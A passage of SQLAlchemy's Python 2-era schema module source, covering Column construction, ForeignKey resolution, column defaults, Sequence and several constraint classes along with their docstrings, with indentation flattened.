of Postgresql SERIAL).
The setting has these two effects on columns that meet the
above criteria:
* DDL issued for the column will include database-specific
keywords intended to signify this column as an
"autoincrement" column, such as AUTO INCREMENT on MySQL,
SERIAL on Postgresql, and IDENTITY on MS-SQL. It does
*not* issue AUTOINCREMENT for SQLite since this is a
special SQLite flag that is not required for autoincrementing
behavior. See the SQLite dialect documentation for
information on SQLite's AUTOINCREMENT.
* The column will be considered to be available as
cursor.lastrowid or equivalent, for those dialects which
"post fetch" newly inserted identifiers after a row has
been inserted (SQLite, MySQL, MS-SQL). It does not have
any effect in this regard for databases that use sequences
to generate primary key identifiers (i.e. Firebird, Postgresql,
Oracle).
:param default: A scalar, Python callable, or
:class:`~sqlalchemy.sql.expression.ClauseElement` representing the
*default value* for this column, which will be invoked upon insert
if this column is otherwise not specified in the VALUES clause of
the insert. This is a shortcut to using :class:`.ColumnDefault` as
a positional argument.
Contrast this argument to ``server_default`` which creates a
default generator on the database side.
:param doc: optional String that can be used by the ORM or similar
to document attributes. This attribute does not render SQL
comments (a future attribute 'comment' will achieve that).
:param key: An optional string identifier which will identify this
``Column`` object on the :class:`.Table`. When a key is provided,
this is the only identifier referencing the ``Column`` within the
application, including ORM attribute mapping; the ``name`` field
is used only when rendering SQL.
:param index: When ``True``, indicates that the column is indexed.
This is a shortcut for using a :class:`.Index` construct on the
table. To specify indexes with explicit names or indexes that
contain multiple columns, use the :class:`.Index` construct
instead.
:param info: A dictionary which defaults to ``{}``. A space to store
application specific data. This must be a dictionary.
:param nullable: If set to the default of ``True``, indicates the
column will be rendered as allowing NULL, else it's rendered as
NOT NULL. This parameter is only used when issuing CREATE TABLE
statements.
:param onupdate: A scalar, Python callable, or
:class:`~sqlalchemy.sql.expression.ClauseElement` representing a
default value to be applied to the column within UPDATE
statements, which wil be invoked upon update if this column is not
present in the SET clause of the update. This is a shortcut to
using :class:`.ColumnDefault` as a positional argument with
``for_update=True``.
:param primary_key: If ``True``, marks this column as a primary key
column. Multiple columns can have this flag set to specify
composite primary keys. As an alternative, the primary key of a
:class:`.Table` can be specified via an explicit
:class:`.PrimaryKeyConstraint` object.
:param server_default: A :class:`.FetchedValue` instance, str, Unicode
or :func:`~sqlalchemy.sql.expression.text` construct representing
the DDL DEFAULT value for the column.
String types will be emitted as-is, surrounded by single quotes::
Column('x', Text, server_default="val")
x TEXT DEFAULT 'val'
A :func:`~sqlalchemy.sql.expression.text` expression will be
rendered as-is, without quotes::
Column('y', DateTime, server_default=text('NOW()'))0
y DATETIME DEFAULT NOW()
Strings and text() will be converted into a :class:`.DefaultClause`
object upon initialization.
Use :class:`.FetchedValue` to indicate that an already-existing
column will generate a default value on the database side which
will be available to SQLAlchemy for post-fetch after inserts. This
construct does not specify any DDL and the implementation is left
to the database, such as via a trigger.
:param server_onupdate: A :class:`.FetchedValue` instance
representing a database-side default generation function. This
indicates to SQLAlchemy that a newly generated value will be
available after updates. This construct does not specify any DDL
and the implementation is left to the database, such as via a
trigger.
:param quote: Force quoting of this column's name on or off,
corresponding to ``True`` or ``False``. When left at its default
of ``None``, the column identifier will be quoted according to
whether the name is case sensitive (identifiers with at least one
upper case character are treated as case sensitive), or if it's a
reserved word. This flag is only needed to force quoting of a
reserved word which is not known by the SQLAlchemy dialect.
:param unique: When ``True``, indicates that this column contains a
unique constraint, or if ``index`` is ``True`` as well, indicates
that the :class:`.Index` should be created with the unique flag.
To specify multiple columns in the constraint/index or to specify
an explicit name, use the :class:`.UniqueConstraint` or
:class:`.Index` constructs explicitly.
"""
name = kwargs.pop('name', None)
type_ = kwargs.pop('type_', None)
args = list(args)
if args:
if isinstance(args[0], basestring):
if name is not None:
raise exc.ArgumentError(
"May not pass name positionally and as a keyword.")
name = args.pop(0)
if args:
coltype = args[0]
if (isinstance(coltype, sqltypes.TypeEngine) or
(isinstance(coltype, type) and
issubclass(coltype, sqltypes.TypeEngine))):
if type_ is not None:
raise exc.ArgumentError(
"May not pass type_ positionally and as a keyword.")
type_ = args.pop(0)
no_type = type_ is None
super(Column, self).__init__(name, None, type_)
self.key = kwargs.pop('key', name)
self.primary_key = kwargs.pop('primary_key', False)
self.nullable = kwargs.pop('nullable', not self.primary_key)
self.default = kwargs.pop('default', None)
self.server_default = kwargs.pop('server_default', None)
self.server_onupdate = kwargs.pop('server_onupdate', None)
self.index = kwargs.pop('index', None)
self.unique = kwargs.pop('unique', None)
self.quote = kwargs.pop('quote', None)
self.doc = kwargs.pop('doc', None)
self.onupdate = kwargs.pop('onupdate', None)
self.autoincrement = kwargs.pop('autoincrement', True)
self.constraints = set()
self.foreign_keys = set()
# check if this Column is proxying another column
if '_proxies' in kwargs:
self.proxies = kwargs.pop('_proxies')
# otherwise, add DDL-related events
elif isinstance(self.type, sqltypes.SchemaType):
self.type._set_parent_with_dispatch(self)
if self.default is not None:
if isinstance(self.default, (ColumnDefault, Sequence)):
args.append(self.default)
else:
if getattr(self.type, '_warn_on_bytestring', False):
# Py3K
#if isinstance(self.default, bytes):
# Py2K
if isinstance(self.default, str):
# end Py2K
util.warn("Unicode column received non-unicode "
"default value.")
args.append(ColumnDefault(self.default))
if self.server_default is not None:
if isinstance(self.server_default, FetchedValue):
args.append(self.server_default)
else:
args.append(DefaultClause(self.server_default))
if self.onupdate is not None:
if isinstance(self.onupdate, (ColumnDefault, Sequence)):
args.append(self.onupdate)
else:
args.append(ColumnDefault(self.onupdate, for_update=True))
if self.server_onupdate is not None:
if isinstance(self.server_onupdate, FetchedValue):
args.append(self.server_onupdate)
else:
args.append(DefaultClause(self.server_onupdate,
for_update=True))
self._init_items(*args)
if not self.foreign_keys and no_type:
raise exc.ArgumentError("'type' is required on Column objects "
"which have no foreign keys.")
util.set_creation_order(self)
if 'info' in kwargs:
self.info = kwargs.pop('info')
if kwargs:
raise exc.ArgumentError(
"Unknown arguments passed to Column: " + repr(kwargs.keys()))
def __str__(self):
if self.name is None:
return "(no name)"
elif self.table is not None:
if self.table.named_with_column:
return (self.table.description + "." + self.description)
else:
return self.description
else:
return self.description
def references(self, column):
"""Return True if this Column references the given column via foreign
key."""
for fk in self.foreign_keys:
if fk.column.proxy_set.intersection(column.proxy_set):
return True
else:
return False
def append_foreign_key(self, fk):
fk._set_parent_with_dispatch(self)
def __repr__(self):
kwarg = []
if self.key != self.name:
kwarg.append('key')
if self.primary_key:
kwarg.append('primary_key')
if not self.nullable:
kwarg.append('nullable')
if self.onupdate:
kwarg.append('onupdate')
if self.default:
kwarg.append('default')
if self.server_default:
kwarg.append('server_default')
return "Column(%s)" % ', '.join(
[repr(self.name)] + [repr(self.type)] +
[repr(x) for x in self.foreign_keys if x is not None] +
[repr(x) for x in self.constraints] +
[(self.table is not None and "table=<%s>" %
self.table.description or "")] +
["%s=%s" % (k, repr(getattr(self, k))) for k in kwarg])
def _set_parent(self, table):
if not self.name:
raise exc.ArgumentError(
"Column must be constructed with a non-blank name or "
"assign a non-blank .name before adding to a Table.")
if self.key is None:
self.key = self.name
if getattr(self, 'table', None) is not None:
raise exc.ArgumentError(
"Column object already assigned to Table '%s'" %
self.table.description)
if self.key in table._columns:
col = table._columns.get(self.key)
for fk in list(col.foreign_keys):
col.foreign_keys.remove(fk)
table.foreign_keys.remove(fk)
if fk.constraint in table.constraints:
# this might have been removed
# already, if it's a composite constraint
# and more than one col being replaced
table.constraints.remove(fk.constraint)
table._columns.replace(self)
if self.primary_key:
table.primary_key._replace(self)
elif self.key in table.primary_key:
raise exc.ArgumentError(
"Trying to redefine primary-key column '%s' as a "
"non-primary-key column on table '%s'" % (
self.key, table.fullname))
self.table = table
if self.index:
if isinstance(self.index, basestring):
raise exc.ArgumentError(
"The 'index' keyword argument on Column is boolean only. "
"To create indexes with a specific name, create an "
"explicit Index object external to the Table.")
Index(expression._generated_label('ix_%s' % self._label), self, unique=self.unique)
elif self.unique:
if isinstance(self.unique, basestring):
raise exc.ArgumentError(
"The 'unique' keyword argument on Column is boolean "
"only. To create unique constraints or indexes with a "
"specific name, append an explicit UniqueConstraint to "
"the Table's list of elements, or create an explicit "
"Index object external to the Table.")
table.append_constraint(UniqueConstraint(self.key))
def _on_table_attach(self, fn):
if self.table is not None:
fn(self, self.table)
event.listen(self, 'after_parent_attach', fn)
def copy(self, **kw):
"""Create a copy of this ``Column``, unitialized.
This is used in ``Table.tometadata``.
"""
# Constraint objects plus non-constraint-bound ForeignKey objects
args = \
[c.copy(**kw) for c in self.constraints] + \
[c.copy(**kw) for c in self.foreign_keys if not c.constraint]
c = Column(
name=self.name,
type_=self.type,
key = self.key,
primary_key = self.primary_key,
nullable = self.nullable,
unique = self.unique,
quote=self.quote,
index=self.index,
autoincrement=self.autoincrement,
default=self.default,
server_default=self.server_default,
onupdate=self.onupdate,
server_onupdate=self.server_onupdate,
info=self.info,
doc=self.doc,
*args
)
c.dispatch._update(self.dispatch)
return c
def _make_proxy(self, selectable, name=None):
"""Create a *proxy* for this column.
This is a copy of this ``Column`` referenced by a different parent
(such as an alias or select statement). The column should
be used only in select scenarios, as its full DDL/default
information is not transferred.
"""
fk = [ForeignKey(f.column) for f in self.foreign_keys]
if name is None and self.name is None:
raise exc.InvalidRequestError("Cannot initialize a sub-selectable"
" with this Column object until it's 'name' has "
"been assigned.")
try:
c = self._constructor(
name or self.name,
self.type,
key = name or self.key,
primary_key = self.primary_key,
nullable = self.nullable,
quote=self.quote, _proxies=[self], *fk)
except TypeError, e:
# Py3K
#raise TypeError(
# "Could not create a copy of this %r object. "
# "Ensure the class includes a _constructor() "
# "attribute or method which accepts the "
# "standard Column constructor arguments, or "
# "references the Column class itself." % self.__class__) from e
# Py2K
raise TypeError(
"Could not create a copy of this %r object. "
"Ensure the class includes a _constructor() "
"attribute or method which accepts the "
"standard Column constructor arguments, or "
"references the Column class itself. "
"Original error: %s" % (self.__class__, e))
# end Py2K
c.table = selectable
selectable._columns.add(c)
if self.primary_key:
selectable.primary_key.add(c)
c.dispatch.after_parent_attach(c, selectable)
return c
def get_children(self, schema_visitor=False, **kwargs):
if schema_visitor:
return [x for x in (self.default, self.onupdate)
if x is not None] + \
list(self.foreign_keys) + list(self.constraints)
else:
return expression.ColumnClause.get_children(self, **kwargs)
class ForeignKey(SchemaItem):
"""Defines a dependency between two columns.
``ForeignKey`` is specified as an argument to a :class:`.Column` object,
e.g.::
t = Table("remote_table", metadata,
Column("remote_id", ForeignKey("main_table.id"))
)
Note that ``ForeignKey`` is only a marker object that defines
a dependency between two columns. The actual constraint
is in all cases represented by the :class:`.ForeignKeyConstraint`
object. This object will be generated automatically when
a ``ForeignKey`` is associated with a :class:`.Column` which
in turn is associated with a :class:`.Table`. Conversely,
when :class:`.ForeignKeyConstraint` is applied to a :class:`.Table`,
``ForeignKey`` markers are automatically generated to be
present on each associated :class:`.Column`, which are also
associated with the constraint object.
Note that you cannot define a "composite" foreign key constraint,
that is a constraint between a grouping of multiple parent/child
columns, using ``ForeignKey`` objects. To define this grouping,
the :class:`.ForeignKeyConstraint` object must be used, and applied
to the :class:`.Table`. The associated ``ForeignKey`` objects
are created automatically.
The ``ForeignKey`` objects associated with an individual
:class:`.Column` object are available in the `foreign_keys` collection
of that column.
Further examples of foreign key configuration are in
:ref:`metadata_foreignkeys`.
"""
__visit_name__ = 'foreign_key'
def __init__(self, column, _constraint=None, use_alter=False, name=None,
onupdate=None, ondelete=None, deferrable=None,
initially=None, link_to_name=False):
"""
Construct a column-level FOREIGN KEY.
The :class:`.ForeignKey` object when constructed generates a
:class:`.ForeignKeyConstraint` which is associated with the parent
:class:`.Table` object's collection of constraints.
:param column: A single target column for the key relationship. A
:class:`.Column` object or a column name as a string:
``tablename.columnkey`` or ``schema.tablename.columnkey``.
``columnkey`` is the ``key`` which has been assigned to the column
(defaults to the column name itself), unless ``link_to_name`` is
``True`` in which case the rendered name of the column is used.
:param name: Optional string. An in-database name for the key if
`constraint` is not provided.
:param onupdate: Optional string. If set, emit ON UPDATE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param ondelete: Optional string. If set, emit ON DELETE <value> when
issuing DDL for this constraint. Typical values include CASCADE,
DELETE and RESTRICT.
:param deferrable: Optional bool. If set, emit DEFERRABLE or NOT
DEFERRABLE when issuing DDL for this constraint.
:param initially: Optional string. If set, emit INITIALLY <value> when
issuing DDL for this constraint.
:param link_to_name: if True, the string name given in ``column`` is
the rendered name of the referenced column, not its locally
assigned ``key``.
:param use_alter: passed to the underlying
:class:`.ForeignKeyConstraint` to indicate the constraint should be
generated/dropped externally from the CREATE TABLE/ DROP TABLE
statement. See that classes' constructor for details.
"""
self._colspec = column
# the linked ForeignKeyConstraint.
# ForeignKey will create this when parent Column
# is attached to a Table, *or* ForeignKeyConstraint
# object passes itself in when creating ForeignKey
# markers.
self.constraint = _constraint
self.use_alter = use_alter
self.name = name
self.onupdate = onupdate
self.ondelete = ondelete
self.deferrable = deferrable
self.initially = initially
self.link_to_name = link_to_name
def __repr__(self):
return "ForeignKey(%r)" % self._get_colspec()
def copy(self, schema=None):
"""Produce a copy of this :class:`.ForeignKey` object.
The new :class:`.ForeignKey` will not be bound
to any :class:`.Column`.
This method is usually used by the internal
copy procedures of :class:`.Column`, :class:`.Table`,
and :class:`.MetaData`.
:param schema: The returned :class:`.ForeignKey` will
reference the original table and column name, qualified
by the given string schema name.
"""
fk = ForeignKey(
self._get_colspec(schema=schema),
use_alter=self.use_alter,
name=self.name,
onupdate=self.onupdate,
ondelete=self.ondelete,
deferrable=self.deferrable,
initially=self.initially,
link_to_name=self.link_to_name
)
fk.dispatch._update(self.dispatch)
return fk
def _get_colspec(self, schema=None):
"""Return a string based 'column specification' for this :class:`.ForeignKey`.
This is usually the equivalent of the string-based "tablename.colname"
argument first passed to the object's constructor.
"""
if schema:
return schema + "." + self.column.table.name + \
"." + self.column.key
elif isinstance(self._colspec, basestring):
return self._colspec
elif hasattr(self._colspec, '__clause_element__'):
_column = self._colspec.__clause_element__()
else:
_column = self._colspec
return "%s.%s" % (_column.table.fullname, _column.key)
target_fullname = property(_get_colspec)
def references(self, table):
"""Return True if the given :class:`.Table` is referenced by this :class:`.ForeignKey`."""
return table.corresponding_column(self.column) is not None
def get_referent(self, table):
"""Return the :class:`.Column` in the given :class:`.Table`
referenced by this :class:`.ForeignKey`.
Returns None if this :class:`.ForeignKey` does not reference the given
:class:`.Table`.
"""
return table.corresponding_column(self.column)
@util.memoized_property
def column(self):
"""Return the target :class:`.Column` referenced by this :class:`.ForeignKey`.
If this :class:`.ForeignKey` was created using a
string-based target column specification, this
attribute will on first access initiate a resolution
process to locate the referenced remote
:class:`.Column`. The resolution process traverses
to the parent :class:`.Column`, :class:`.Table`, and
:class:`.MetaData` to proceed - if any of these aren't
yet present, an error is raised.
"""
# ForeignKey inits its remote column as late as possible, so tables
# can be defined without dependencies
if isinstance(self._colspec, basestring):
# locate the parent table this foreign key is attached to. we
# use the "original" column which our parent column represents
# (its a list of columns/other ColumnElements if the parent
# table is a UNION)
for c in self.parent.base_columns:
if isinstance(c, Column):
parenttable = c.table
break
else:
raise exc.ArgumentError(
"Parent column '%s' does not descend from a "
"table-attached Column" % str(self.parent))
m = self._colspec.split('.')
if m is None:
raise exc.ArgumentError(
"Invalid foreign key column specification: %s" %
self._colspec)
# A FK between column 'bar' and table 'foo' can be
# specified as 'foo', 'foo.bar', 'dbo.foo.bar',
# 'otherdb.dbo.foo.bar'. Once we have the column name and
# the table name, treat everything else as the schema
# name. Some databases (e.g. Sybase) support
# inter-database foreign keys. See tickets#1341 and --
# indirectly related -- Ticket #594. This assumes that '.'
# will never appear *within* any component of the FK.
(schema, tname, colname) = (None, None, None)
if (len(m) == 1):
tname = m.pop()
else:
colname = m.pop()
tname = m.pop()
if (len(m) > 0):
schema = '.'.join(m)
if _get_table_key(tname, schema) not in parenttable.metadata:
raise exc.NoReferencedTableError(
"Foreign key associated with column '%s' could not find "
"table '%s' with which to generate a "
"foreign key to target column '%s'" % (self.parent, tname, colname),
tname)
table = Table(tname, parenttable.metadata,
mustexist=True, schema=schema)
_column = None
if colname is None:
# colname is None in the case that ForeignKey argument
# was specified as table name only, in which case we
# match the column name to the same column on the
# parent.
key = self.parent
_column = table.c.get(self.parent.key, None)
elif self.link_to_name:
key = colname
for c in table.c:
if c.name == colname:
_column = c
else:
key = colname
_column = table.c.get(colname, None)
if _column is None:
raise exc.NoReferencedColumnError(
"Could not create ForeignKey '%s' on table '%s': "
"table '%s' has no column named '%s'" % (
self._colspec, parenttable.name, table.name, key),
table.name, key)
elif hasattr(self._colspec, '__clause_element__'):
_column = self._colspec.__clause_element__()
else:
_column = self._colspec
# propagate TypeEngine to parent if it didn't have one
if isinstance(self.parent.type, sqltypes.NullType):
self.parent.type = _column.type
return _column
def _set_parent(self, column):
if hasattr(self, 'parent'):
if self.parent is column:
return
raise exc.InvalidRequestError(
"This ForeignKey already has a parent !")
self.parent = column
self.parent.foreign_keys.add(self)
self.parent._on_table_attach(self._set_table)
def _set_table(self, column, table):
# standalone ForeignKey - create ForeignKeyConstraint
# on the hosting Table when attached to the Table.
if self.constraint is None and isinstance(table, Table):
self.constraint = ForeignKeyConstraint(
[], [], use_alter=self.use_alter, name=self.name,
onupdate=self.onupdate, ondelete=self.ondelete,
deferrable=self.deferrable, initially=self.initially,
)
self.constraint._elements[self.parent] = self
self.constraint._set_parent_with_dispatch(table)
table.foreign_keys.add(self)
class _NotAColumnExpr(object):
def _not_a_column_expr(self):
raise exc.InvalidRequestError(
"This %s cannot be used directly "
"as a column expression." % self.__class__.__name__)
__clause_element__ = self_group = lambda self: self._not_a_column_expr()
_from_objects = property(lambda self: self._not_a_column_expr())
class DefaultGenerator(_NotAColumnExpr, SchemaItem):
"""Base class for column *default* values."""
__visit_name__ = 'default_generator'
is_sequence = False
is_server_default = False
column = None
def __init__(self, for_update=False):
self.for_update = for_update
def _set_parent(self, column):
self.column = column
if self.for_update:
self.column.onupdate = self
else:
self.column.default = self
def execute(self, bind=None, **kwargs):
if bind is None:
bind = _bind_or_error(self)
return bind._execute_default(self, **kwargs)
@property
def bind(self):
"""Return the connectable associated with this default."""
if getattr(self, 'column', None) is not None:
return self.column.table.bind
else:
return None
def __repr__(self):
return "DefaultGenerator()"
class ColumnDefault(DefaultGenerator):
"""A plain default value on a column.
This could correspond to a constant, a callable function,
or a SQL clause.
:class:`.ColumnDefault` is generated automatically
whenever the ``default``, ``onupdate`` arguments of
:class:`.Column` are used. A :class:`.ColumnDefault`
can be passed positionally as well.
For example, the following::
Column('foo', Integer, default=50)
Is equivalent to::
Column('foo', Integer, ColumnDefault(50))
"""
def __init__(self, arg, **kwargs):
super(ColumnDefault, self).__init__(**kwargs)
if isinstance(arg, FetchedValue):
raise exc.ArgumentError(
"ColumnDefault may not be a server-side default type.")
if util.callable(arg):
arg = self._maybe_wrap_callable(arg)
self.arg = arg
@util.memoized_property
def is_callable(self):
return util.callable(self.arg)
@util.memoized_property
def is_clause_element(self):
return isinstance(self.arg, expression.ClauseElement)
@util.memoized_property
def is_scalar(self):
return not self.is_callable and \
not self.is_clause_element and \
not self.is_sequence
def _maybe_wrap_callable(self, fn):
"""Backward compat: Wrap callables that don't accept a context."""
if inspect.isfunction(fn):
inspectable = fn
elif inspect.isclass(fn):
inspectable = fn.__init__
elif hasattr(fn, '__call__'):
inspectable = fn.__call__
else:
# probably not inspectable, try anyways.
inspectable = fn
try:
argspec = inspect.getargspec(inspectable)
except TypeError:
return lambda ctx: fn()
positionals = len(argspec[0])
# Py3K compat - no unbound methods
if inspect.ismethod(inspectable) or inspect.isclass(fn):
positionals -= 1
if positionals == 0:
return lambda ctx: fn()
defaulted = argspec[3] is not None and len(argspec[3]) or 0
if positionals - defaulted > 1:
raise exc.ArgumentError(
"ColumnDefault Python function takes zero or one "
"positional arguments")
return fn
def _visit_name(self):
if self.for_update:
return "column_onupdate"
else:
return "column_default"
__visit_name__ = property(_visit_name)
def __repr__(self):
return "ColumnDefault(%r)" % self.arg
class Sequence(DefaultGenerator):
"""Represents a named database sequence.
The :class:`.Sequence` object represents the name and configurational
parameters of a database sequence. It also represents
a construct that can be "executed" by a SQLAlchemy :class:`.Engine`
or :class:`.Connection`, rendering the appropriate "next value" function
for the target database and returning a result.
The :class:`.Sequence` is typically associated with a primary key column::
some_table = Table('some_table', metadata,
Column('id', Integer, Sequence('some_table_seq'), primary_key=True)
)
When CREATE TABLE is emitted for the above :class:`.Table`, if the
target platform supports sequences, a CREATE SEQUENCE statement will
be emitted as well. For platforms that don't support sequences,
the :class:`.Sequence` construct is ignored.
See also: :class:`.CreateSequence` :class:`.DropSequence`
"""
__visit_name__ = 'sequence'
is_sequence = True
def __init__(self, name, start=None, increment=None, schema=None,
optional=False, quote=None, metadata=None,
for_update=False):
"""Construct a :class:`.Sequence` object.
:param name: The name of the sequence.
:param start: the starting index of the sequence. This value is
used when the CREATE SEQUENCE command is emitted to the database
as the value of the "START WITH" clause. If ``None``, the
clause is omitted, which on most platforms indicates a starting
value of 1.
:param increment: the increment value of the sequence. This
value is used when the CREATE SEQUENCE command is emitted to
the database as the value of the "INCREMENT BY" clause. If ``None``,
the clause is omitted, which on most platforms indicates an
increment of 1.
:param schema: Optional schema name for the sequence, if located
in a schema other than the default.
:param optional: boolean value, when ``True``, indicates that this
:class:`.Sequence` object only needs to be explicitly generated
on backends that don't provide another way to generate primary
key identifiers. Currently, it essentially means, "don't create
this sequence on the Postgresql backend, where the SERIAL keyword
creates a sequence for us automatically".
:param quote: boolean value, when ``True`` or ``False``, explicitly
forces quoting of the schema name on or off. When left at its
default of ``None``, normal quoting rules based on casing and reserved
words take place.
:param metadata: optional :class:`.MetaData` object which will be
associated with this :class:`.Sequence`. A :class:`.Sequence`
that is associated with a :class:`.MetaData` gains access to the
``bind`` of that :class:`.MetaData`, meaning the :meth:`.Sequence.create`
and :meth:`.Sequence.drop` methods will make usage of that engine
automatically. Additionally, the appropriate CREATE SEQUENCE/
DROP SEQUENCE DDL commands will be emitted corresponding to this
:class:`.Sequence` when :meth:`.MetaData.create_all` and
:meth:`.MetaData.drop_all` are invoked (new in 0.7).
Note that when a :class:`.Sequence` is applied to a :class:`.Column`,
the :class:`.Sequence` is automatically associated with the
:class:`.MetaData` object of that column's parent :class:`.Table`,
when that association is made. The :class:`.Sequence` will then
be subject to automatic CREATE SEQUENCE/DROP SEQUENCE corresponding
to when the :class:`.Table` object itself is created or dropped,
rather than that of the :class:`.MetaData` object overall.
:param for_update: Indicates this :class:`.Sequence`, when associated
with a :class:`.Column`, should be invoked for UPDATE statements
on that column's table, rather than for INSERT statements, when
no value is otherwise present for that column in the statement.
"""
super(Sequence, self).__init__(for_update=for_update)
self.name = name
self.start = start
self.increment = increment
self.optional = optional
self.quote = quote
self.schema = schema
self.metadata = metadata
self._key = _get_table_key(name, schema)
if metadata:
self._set_metadata(metadata)
@util.memoized_property
def is_callable(self):
return False
@util.memoized_property
def is_clause_element(self):
return False
def next_value(self):
"""Return a :class:`.next_value` function element
which will render the appropriate increment function
for this :class:`.Sequence` within any SQL expression.
"""
return expression.func.next_value(self, bind=self.bind)
def __repr__(self):
return "Sequence(%s)" % ', '.join(
[repr(self.name)] +
["%s=%s" % (k, repr(getattr(self, k)))
for k in ['start', 'increment', 'optional']])
def _set_parent(self, column):
super(Sequence, self)._set_parent(column)
column._on_table_attach(self._set_table)
def _set_table(self, column, table):
self._set_metadata(table.metadata)
def _set_metadata(self, metadata):
self.metadata = metadata
self.metadata._sequences[self._key] = self
@property
def bind(self):
if self.metadata:
return self.metadata.bind
else:
return None
def create(self, bind=None, checkfirst=True):
"""Creates this sequence in the database."""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaGenerator,
self,
checkfirst=checkfirst)
def drop(self, bind=None, checkfirst=True):
"""Drops this sequence from the database."""
if bind is None:
bind = _bind_or_error(self)
bind._run_visitor(ddl.SchemaDropper,
self,
checkfirst=checkfirst)
def _not_a_column_expr(self):
raise exc.InvalidRequestError(
"This %s cannot be used directly "
"as a column expression. Use func.next_value(sequence) "
"to produce a 'next value' function that's usable "
"as a column element."
% self.__class__.__name__)
class FetchedValue(_NotAColumnExpr, events.SchemaEventTarget):
"""A marker for a transparent database-side default.
Use :class:`.FetchedValue` when the database is configured
to provide some automatic default for a column.
E.g.::
Column('foo', Integer, FetchedValue())
Would indicate that some trigger or default generator
will create a new value for the ``foo`` column during an
INSERT.
"""
is_server_default = True
reflected = False
has_argument = False
def __init__(self, for_update=False):
self.for_update = for_update
def _set_parent(self, column):
self.column = column
if self.for_update:
self.column.server_onupdate = self
else:
self.column.server_default = self
def __repr__(self):
return 'FetchedValue(for_update=%r)' % self.for_update
class DefaultClause(FetchedValue):
"""A DDL-specified DEFAULT column value.
:class:`.DefaultClause` is a :class:`.FetchedValue`
that also generates a "DEFAULT" clause when
"CREATE TABLE" is emitted.
:class:`.DefaultClause` is generated automatically
whenever the ``server_default``, ``server_onupdate`` arguments of
:class:`.Column` are used. A :class:`.DefaultClause`
can be passed positionally as well.
For example, the following::
Column('foo', Integer, server_default="50")
Is equivalent to::
Column('foo', Integer, DefaultClause("50"))
"""
has_argument = True
def __init__(self, arg, for_update=False, _reflected=False):
util.assert_arg_type(arg, (basestring,
expression.ClauseElement,
expression._TextClause), 'arg')
super(DefaultClause, self).__init__(for_update)
self.arg = arg
self.reflected = _reflected
def __repr__(self):
return "DefaultClause(%r, for_update=%r)" % \
(self.arg, self.for_update)
class PassiveDefault(DefaultClause):
"""A DDL-specified DEFAULT column value.
.. deprecated:: 0.6 :class:`.PassiveDefault` is deprecated.
Use :class:`.DefaultClause`.
"""
@util.deprecated("0.6",
":class:`.PassiveDefault` is deprecated. "
"Use :class:`.DefaultClause`.",
False)
def __init__(self, *arg, **kw):
DefaultClause.__init__(self, *arg, **kw)
class Constraint(SchemaItem):
"""A table-level SQL constraint."""
__visit_name__ = 'constraint'
def __init__(self, name=None, deferrable=None, initially=None,
_create_rule=None):
"""Create a SQL constraint.
:param name:
Optional, the in-database name of this ``Constraint``.
:param deferrable:
Optional bool. If set, emit DEFERRABLE or NOT DEFERRABLE when
issuing DDL for this constraint.
:param initially:
Optional string. If set, emit INITIALLY <value> when issuing DDL
for this constraint.
:param _create_rule:
a callable which is passed the DDLCompiler object during
compilation. Returns True or False to signal inline generation of
this Constraint.
The AddConstraint and DropConstraint DDL constructs provide
DDLElement's more comprehensive "conditional DDL" approach that is
passed a database connection when DDL is being issued. _create_rule
is instead called during any CREATE TABLE compilation, where there
may not be any transaction/connection in progress. However, it
allows conditional compilation of the constraint even for backends
which do not support addition of constraints through ALTER TABLE,
which currently includes SQLite.
_create_rule is used by some types to create constraints.
Currently, its call signature is subject to change at any time.
"""
self.name = name
self.deferrable = deferrable
self.initially = initially
self._create_rule = _create_rule
util.set_creation_order(self)
@property
def table(self):
try:
if isinstance(self.parent, Table):
return self.parent
except AttributeError:
pass
raise exc.InvalidRequestError(
"This constraint is not bound to a table. Did you "
"mean to call table.add_constraint(constraint) ?")
def _set_parent(self, parent):
self.parent = parent
parent.constraints.add(self)
def copy(self, **kw):
raise NotImplementedError()
class ColumnCollectionMixin(object):
def __init__(self, *columns):
self.columns = expression.ColumnCollection()
self._pending_colargs = [_to_schema_column_or_string(c)
for c in columns]
if self._pending_colargs and \
isinstance(self._pending_colargs[0], Column) and \
self._pending_colargs[0].table is not None:
self._set_parent_with_dispatch(self._pending_colargs[0].table)
def _set_parent(self, table):
for col in self._pending_colargs:
if isinstance(col, basestring):
col = table.c[col]
self.columns.add(col)
class ColumnCollectionConstraint(ColumnCollectionMixin, Constraint):
"""A constraint that proxies a ColumnCollection."""
def __init__(self, *columns, **kw):
"""
:param \*columns:
A sequence of column names or Column objects.
:param name:
Optional, the in-database name of this constraint.
:param deferrable:
Optional bool. If set, emit DEFERRABLE or NOT DEFERRABLE when
issuing DDL for this constraint.
:param initially:
Optional string. If set, emit INITIALLY <value> when issuing DDL
for this constraint.
"""
ColumnCollectionMixin.__init__(self, *columns)
Constraint.__init__(self, **kw)
def _set_parent(self, table):
ColumnCollectionMixin._set_parent(self, table)
Constraint._set_parent(self, table)
def __contains__(self, x):
return x in self.columns
def copy(self, **kw):
c = self.__class__(name=self.name, deferrable=self.deferrable,
initially=self.initially, *self.columns.keys())
c.dispatch._update(self.dispatch)
return c
def contains_column(self, col):
return self.columns.contains_column(col)
def __iter__(self):
# inlining of
# return iter(self.columns)
# ColumnCollection->OrderedProperties->OrderedDict
ordered_dict = self.columns._data
return (ordered_dict[key] for key in ordered_dict._list)
def __len__(self):
return len(self.columns._data)
class CheckConstraint(Constraint):
"""A table- or column-level CHECK constraint.
Can be included in the definition of a Table or Column.
"""
def __init__(self, sqltext, name=None, deferrable=None,
initially=None, table=None, _create_rule=None):
"""Construct a CHECK constraint.
:param sqltext:
A string containing the constraint definition, which will be used
verbatim, or a SQL expression construct.
:param name:
Optional, the in-database name of the constraint.
:param deferrable:
Optional bool. If set, emit DEFERRABLE or NOT DEFERRABLE when
issuing DDL for this constraint.
:param initially:
Optional string. If set, emit INITIALLY <value> when issuing DDL
for this constraint.
"""
super(CheckConstraint, self).\
__init__(name, deferrable, initially, _create_rule)
self.sqltext = expression._literal_as_text(sqltext)
if table is not None:
self._set_parent_with_dispatch(table)
def __visit_name__(self):
if isinstance(self.parent, Table):
return "check_constraint"
else:
return "column_check_constraint"
__visit_name__ = property(__visit_name__)
def copy(self, **kw):
c = CheckConstraint(self.sqltext,
name=self.name,
initially=self.initially,
deferrable=self.deferrable,
_create_rule=self._create_rule)
c.dispatch._update(self.dispatch)
return c
class ForeignKeyConstraint(Constraint):
"""A table-level FOREIGN KEY constraint.
